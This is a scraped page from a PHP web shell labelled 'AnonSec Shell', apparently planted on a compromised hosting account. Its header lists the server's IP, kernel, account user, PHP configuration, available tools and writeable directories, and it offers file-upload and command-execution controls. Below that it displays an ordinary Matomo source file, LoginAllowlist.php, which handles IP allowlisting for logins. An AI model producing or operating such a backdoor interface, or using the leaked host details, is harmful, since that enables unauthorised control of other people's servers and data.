AnonSec Shell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.193
Web Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : awebpaca ( 35430)
PHP Version : 8.5.0
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/awebpaca/piwik/plugins/CoreHome/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/awebpaca/piwik/plugins/CoreHome//LoginAllowlist.php
<?php
/**
 * Matomo - free/libre analytics platform
 *
 * @link https://matomo.org
 * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
 *
 */
namespace Piwik\Plugins\CoreHome;

use Piwik\Common;
use Piwik\Config;
use Piwik\Container\StaticContainer;
use Matomo\Network\IP as NetworkIp;
use Piwik\NoAccessException;
use Piwik\Piwik;
use Piwik\SettingsServer;

/**
 * This class is in CoreHome since some alternative Login plugins disable the Login plugin and we want to ensure the
 * feature works for all login plugins.
 */
class LoginAllowlist
{
    public function shouldAllowlistApplyToAPI()
    {
        $general = $this->getGeneralConfig();
        return !empty($general['login_allowlist_apply_to_reporting_api_requests']) || !empty($general['login_whitelist_apply_to_reporting_api_requests']);
    }

    public function shouldCheckAllowlist()
    {
        if (Common::isPhpCliMode()) {
            return false;
        }

        // ignore whitelist checks for opt out iframe
        if (!SettingsServer::isTrackerApiRequest() && 'CoreAdminHome' === Piwik::getModule() && 'optOut' === Piwik::getAction()) {
            return false;
        }

        $ips = $this->getAllowlistedLoginIps();
        return !empty($ips);
    }

    public function checkIsAllowed($ipString)
    {
        if (!$this->isIpAllowed($ipString)) {
            throw new NoAccessException(Piwik::translate('CoreHome_ExceptionNotAllowlistedIP', $ipString));
        }
    }

    public function isIpAllowed($userIpString)
    {
        $userIp = NetworkIp::fromStringIP($userIpString);
        $ipsAllowed = $this->getAllowlistedLoginIps();

        if (empty($ipsAllowed)) {
            return false;
        }

        return $userIp->isInRanges($ipsAllowed);
    }

    /**
     * @return array
     */
    protected function getAllowlistedLoginIps()
    {
        $ips = StaticContainer::get('login.allowlist.ips');

        if (!empty($ips) && is_array($ips)) {
            $ips = array_map(function ($ip) {
                return trim($ip);
            }, $ips);
            $ips = array_filter($ips, function ($ip) {
                return !empty($ip);
            });
            return array_unique(array_values($ips));
        }

        return array();
    }

    private function getGeneralConfig()
    {
        $config = Config::getInstance();
        $general = $config->General;
        return $general;
    }
}

Anon7 - 2022
AnonSec Team